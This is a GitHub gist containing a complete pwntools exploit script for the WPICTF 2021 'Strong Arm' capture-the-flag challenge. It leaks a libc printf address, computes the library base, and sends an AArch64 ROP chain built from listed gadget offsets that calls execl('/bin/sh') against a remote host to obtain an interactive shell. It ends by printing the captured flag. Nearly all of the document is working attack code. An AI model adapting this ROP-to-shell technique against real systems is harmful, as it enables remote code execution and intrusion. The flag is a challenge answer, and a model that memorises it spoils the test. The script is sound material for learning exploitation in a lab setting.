Skip to content

Instantly share code, notes, and snippets.

@ikerl

ikerl/strong-arm.py Secret

Created Apr 25, 2021
Embed
What would you like to do?
WPICTF 2021 - Strong Arm exploit
#!/bin/python3
from pwn import *
# Libc gadgets (libc-2.23.so)
# 0x0000000000076cb0: ldr x21, [sp, #0x20]; mov x0, x19; ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret;
# 0x000000000002b850: mov x0, x21; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
# 0x00000000000ffab4: mov x1, x19; cbnz x19, #0xffaa4; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
# Libc gadgets (libc-2.31.so)
# 0x000000000006ee5c: ldr x21, [sp, #0x20]; mov x0, x19; ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret;
# 0x000000000004514c: mov x0, x21; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
# x000000000007d304: mov x1, x19; ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
context.binary = "./arm"
binary = './arm'
#p = process(["qemu-aarch64-static", "-L", "/usr/aarch64-linux-gnu/", "-g", "4444" ,binary])
elf = ELF("./arm")
libc_version = "remote"
if libc_version == "local":
libc = ELF("/usr/aarch64-linux-gnu/lib/libc-2.31.so")
p = process(["qemu-aarch64-static", "-L", "/usr/aarch64-linux-gnu/", binary])
else:
libc = ELF("./libc-2.23.so")
p = remote("172.104.14.64",54732)
p.readline()
leak = p.readline()
leaked_pointer = int(str(leak).split(" ")[-1].replace("0x","").replace("\\n'",""),16)
libc_execl_offset = libc.symbols["execl"]
libc_bin_sh_offset = next(libc.search(b"/bin/sh"))
libc_printf_offset = libc.symbols["printf"]
libc_exit_offset = libc.symbols["exit"]
print(libc_printf_offset)
printf_leak_address = leaked_pointer
libc_base = printf_leak_address - libc_printf_offset
execl_ptr = libc_execl_offset + libc_base
binsh_ptr = libc_bin_sh_offset + libc_base
exit_ptr = libc_exit_offset + libc_base
log.info("Leaked printf ptr: {}".format(hex(printf_leak_address)))
log.info("Execl function ptr: {}".format(hex(execl_ptr)))
log.info("BinSh str ptr: {}".format(hex(binsh_ptr)))
if libc_version == "local":
x21_gadget = p64(0x6ee5c+libc_base)
copy_x21_x0 = p64(0x4514c+libc_base)
clear_x1 = p64(0x7d304+libc_base)
else:
x21_gadget = p64(0x76cb0+libc_base)
copy_x21_x0 = p64(0x2b850+libc_base)
clear_x1 = p64(0xffab4+libc_base)
offset_sp = 128
offset_x30 = 136
f_execl = p64(execl_ptr)
binsh = p64(binsh_ptr)
f_exit = p64(exit_ptr)
p.recvuntil("> ")
x21_val = binsh
# EXECL
# x0 : /bin/sh
# x1: NULL
payload = binsh*17 + x21_gadget + 24*b"B" + copy_x21_x0 + 16*b"C" + x21_val + 16*b"D" + clear_x1 + b"\x00"*40 + f_execl*10
p.sendline(payload + 100*binsh)
p.interactive()
# WPI{a1ARM3d_arM315}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment